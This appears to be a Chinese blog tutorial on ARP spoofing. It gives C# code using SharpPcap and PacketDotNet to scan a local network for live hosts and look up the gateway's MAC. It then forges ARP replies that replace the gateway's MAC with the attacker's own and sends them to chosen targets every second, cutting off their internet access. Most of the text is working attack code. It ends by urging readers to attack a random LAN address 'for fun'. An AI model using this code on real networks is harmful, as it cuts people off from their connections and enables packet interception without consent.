摘一段來自網上的arp欺詐解釋:ARP欺騙(ARP spoofing),又稱ARP毒化(ARP poisoning,網絡上多譯爲ARP病毒)或ARP攻擊,是針對以太網地址解析協議(ARP)的一種攻擊技術,通過欺騙局域網內訪問者PC的網關MAC地址,使訪問者PC錯以爲攻擊者更改後的MAC地址是網關的MAC,導致網絡不通。此種攻擊可讓攻擊者獲取局域網上的數據包甚至可篡改數據包,且可讓網絡上特定計算機或所有計算機無法正常連線。
換做我的話就是:告訴目標主機錯誤的網關MAC地址,這樣直接讓目標主機無法通過網關訪問互聯網或者其他網段的以太網。
主機欺詐
創建一個arp包,將網關ip地址和錯誤的網關mac地址發送給目標主機,讓主機更新錯誤的mac-ip地址映射到緩存中。
工具
開源的.net arp庫: SharpPcap,PacketDotNet
項目中導入:
<PackageReference Include="PacketDotNet" Version="1.4.7" />
<PackageReference Include="SharpPcap" Version="6.2.5" />
實戰
獲取本機所有的網絡設備
LibPcapLiveDeviceList.Instance
獲取對應設備的ip和mac地址,以及網關ip
foreach (var address in LibPcapLiveDevice.Addresses)
{
if (address.Addr.type == Sockaddr.AddressTypes.AF_INET_AF_INET6)
{
//ipv4地址
if (address.Addr.ipAddress.AddressFamily == AddressFamily.InterNetwork)
{
LocalIp = address.Addr.ipAddress;
break;
}
}
}
foreach (var address in LibPcapLiveDevice.Addresses)
{
if (address.Addr.type == Sockaddr.AddressTypes.HARDWARE)
{
LocalMac = address.Addr.hardwareAddress; // 本機MAC
}
}
var gw = LibPcapLiveDevice.Interface.GatewayAddresses; // 網關IP
//ipv4的gateway
GatewayIp = gw?.FirstOrDefault(x => x.AddressFamily == AddressFamily.InterNetwork);
獲取網關mac地址
通過發送arp包到網關,獲取響應包,從響應包中獲取mac地址。
1.創建arp包
var ethernetPacket = new EthernetPacket(localMac, PhysicalAddress.Parse("FF-FF-FF-FF-FF-FF"), EthernetType.Arp);
var arpPacket = new ArpPacket(ArpOperation.Request, PhysicalAddress.Parse("00-00-00-00-00-00"), destinationIP, localMac, localIP);
ethernetPacket.PayloadPacket = arpPacket;
2.發送arp包到網關,並且等待下一個回覆包。
LibPcapLiveDevice.Open(DeviceModes.Promiscuous, 20);
LibPcapLiveDevice.Filter = arpFilter;
var lastRequestTime = DateTime.FromBinary(0);
var requestInterval = TimeSpan.FromMilliseconds(200);
ArpPacket arpPacket = null;
var timeoutDateTime = DateTime.Now + _timeout;
while (DateTime.Now < timeoutDateTime)
{
if (requestInterval < (DateTime.Now - lastRequestTime))
{
LibPcapLiveDevice.SendPacket(request);
lastRequestTime = DateTime.Now;
}
if (LibPcapLiveDevice.GetNextPacket(out var packet) > 0)
{
if (packet.Device.LinkType != LinkLayers.Ethernet)
{
continue;
}
var pack = Packet.ParsePacket(packet.Device.LinkType, packet.Data.ToArray());
arpPacket = pack.Extract<ArpPacket>();
if (arpPacket == null)//是否是一個arp包
{
continue;
}
if (arpPacket.SenderProtocolAddress.Equals(destIP))
{
break;
}
}
}
// free the device
LibPcapLiveDevice.Close();
return arpPacket?.SenderHardwareAddress;
掃描局域網內活動ip和mac地址
1.設置掃描的ip區間,生成每個ip的arp請求包
var arpPackets = new Packet[targetIPList.Count];
for (int i = 0; i < arpPackets.Length; ++i)
{
arpPackets[i] = BuildRequest(targetIPList[i], LocalMac, LocalIp);
}
2.發送arp包到各個ip,如果回覆了則在線,超時則認爲不活動
if (_cancellationTokenSource.IsCancellationRequested)
{
break;
}
var lastRequestTime = DateTime.FromBinary(0);
var requestInterval = TimeSpan.FromMilliseconds(200);
var timeoutDateTime = DateTime.Now + _timeout;
while (DateTime.Now < timeoutDateTime)
{
if (_cancellationTokenSource.IsCancellationRequested)
{
break;
}
if (requestInterval < (DateTime.Now - lastRequestTime))
{
LibPcapLiveDevice.SendPacket(arpPackets[i]);
lastRequestTime = DateTime.Now;
}
if (LibPcapLiveDevice.GetNextPacket(out var packet) > 0)
{
if (packet.Device.LinkType != LinkLayers.Ethernet)
{
continue;
}
var pack = Packet.ParsePacket(packet.Device.LinkType, packet.Data.ToArray());
var arpPacket = pack.Extract<ArpPacket>();
if (arpPacket == null)
{
continue;
}
//回覆的arp包並且是我們請求的ip地址
if (arpPacket.SenderProtocolAddress.Equals(targetIPList[i]))
{
Application.Current.Dispatcher.Invoke(() =>
{
///增加到IPlist中
Computers.Add(new Computer()
{
IPAddress = arpPacket.SenderProtocolAddress.ToString(),
MacAddress = arpPacket.SenderHardwareAddress?.ToString(),
});
});
break;
}
}
}
指定ip/ips攻擊
攻擊包就不能創建請求包, 應該僞造一個來自網關的響應包,從而將網關錯誤的mac地址更新到目標主機的緩存中。
1.創建錯誤的響應包
private Packet BuildResponse(IPAddress destIP, PhysicalAddress destMac, IPAddress senderIP, PhysicalAddress senderMac)
{
var ethernetPacket = new EthernetPacket(senderMac, destMac, EthernetType.Arp);
var arpPacket = new ArpPacket(ArpOperation.Response, destMac, destIP, senderMac, senderIP);
ethernetPacket.PayloadPacket = arpPacket;
return ethernetPacket;
}
調用創建arp響應包,但是可以看到最後一個mac地址,應該是網關的mac地址,我們替換成了自己本地mac地址。
BuildResponse(IPAddress.Parse(compute.IPAddress), PhysicalAddress.Parse(compute.MacAddress), GatewayIp, LocalMac);
2.直接以1000ms的間隔輪詢發送響應包到目標主機
var aTask = Task.Run(async () =>
{
while (true)
{
if (_cancellationTokenSource1.IsCancellationRequested)
{
break;
}
try
{
LibPcapLiveDevice.SendPacket(packet);
}
catch (Exception ex)
{
MessageBox.Show(ex.Message);
}
await Task.Delay(1000);
}
LibPcapLiveDevice.Close();
}, _cancellationTokenSource1.Token);
效果
隨機選一個局域網ip攻擊它吧!看他不能上網的樣子。切記僅限於娛樂,不要影響任何工作和業務。